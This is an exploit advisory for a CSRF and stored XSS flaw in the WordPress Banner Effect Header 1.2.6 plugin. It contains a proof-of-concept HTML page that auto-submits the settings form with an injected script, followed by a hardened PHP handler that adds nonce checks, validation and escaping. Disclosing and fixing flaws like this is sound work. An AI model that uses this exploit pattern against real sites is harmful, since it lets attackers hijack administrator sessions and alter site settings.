|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: WordPress Banner Effect Header 1.2.6 Plugin XSS, CSRF Vulnerability |
|[*] Date: 2015-01-02 |
|[*] Exploit Author: Ashiyane Digital Security Team |
|[*] Vendor Homepage: https://wordpress.org/plugins/banner-effect-header/ |
|[*] Plugin Link: https://downloads.wordpress.org/plugin/banner-effect-header.zip |
|[*] Tested on: Windows 7 |
|[*] Discovered By: Mahdi.Hidden |
|-------------------------------------------------------------------------|
|
|[*] Location: http://[localhost]/[path]/wp-admin/options-general.php?page=BannerEffectOptions |
|-------------------------------------------------------------------------|

Exploit Code:

<html>
<body>
<form name="post_form" method="post" action="http://localhost/wordpress/wp-admin/options-general.php?page=BannerEffectOptions">
<input type="hidden" name="banner_effect_submit_hidden" value="Y">
<input type="hidden" name="banner_effect_email" value='a@a.com"><script>alert(/xss/)</script>'>
<script language="Javascript">
setTimeout('post_form.submit()', 1);
</script>
</form>
</body>
</html>

|-------------------------------------------------------------------------|
| This is CSRF & XSS: the settings form is submitted cross-site with no anti-CSRF token, and the injected banner_effect_email value ends up in the page unescaped. |
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
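The defensive counterpart, as an added example that is not the plugin's own code: a hypothetical settings handler for such an options page that closes both holes with WordPress core's nonce, validation and escaping helpers (the function, option and field names starting with banner_effect_ are assumed for illustration).

```php
<?php
// Added example: a hardened settings handler for a hypothetical plugin options
// page. It is not the Banner Effect Header plugin's own code; the option and
// field names are assumed for illustration. Only WordPress core helpers are used.

function banner_effect_options_page() {
    // Only users allowed to manage options may reach the form at all.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    if ( isset( $_POST['banner_effect_submit_hidden'] ) && 'Y' === $_POST['banner_effect_submit_hidden'] ) {
        // CSRF fix: the POST must carry a nonce bound to this action and this
        // user. A cross-site auto-submitting form cannot obtain it, so the
        // request dies here instead of being saved.
        check_admin_referer( 'banner_effect_save_options', 'banner_effect_nonce' );

        // Input validation: only a syntactically valid e-mail address is stored,
        // so characters like " < > ( ) / from an injected value are dropped.
        $email = sanitize_email( wp_unslash( $_POST['banner_effect_email'] ) );
        if ( ! is_email( $email ) ) {
            wp_die( 'Invalid e-mail address.' );
        }
        update_option( 'banner_effect_email', $email );
    }

    $email = get_option( 'banner_effect_email', '' );
    ?>
    <div class="wrap">
        <h2>Banner Effect Options</h2>
        <form method="post" action="">
            <?php wp_nonce_field( 'banner_effect_save_options', 'banner_effect_nonce' ); ?>
            <input type="hidden" name="banner_effect_submit_hidden" value="Y">
            <label for="banner_effect_email">E-mail:</label>
            <!-- XSS fix: esc_attr() encodes " < > & so the stored value cannot
                 break out of the attribute even if validation were bypassed. -->
            <input type="text" id="banner_effect_email" name="banner_effect_email"
                   value="<?php echo esc_attr( $email ); ?>">
            <?php submit_button( 'Save' ); ?>
        </form>
    </div>
    <?php
}
```

Output escaping is the control that matters for the XSS even when validation is loosened later; the nonce check alone would not stop an administrator who is tricked into submitting the form while logged in, but it does stop the cross-site auto-submit shown in the PoC.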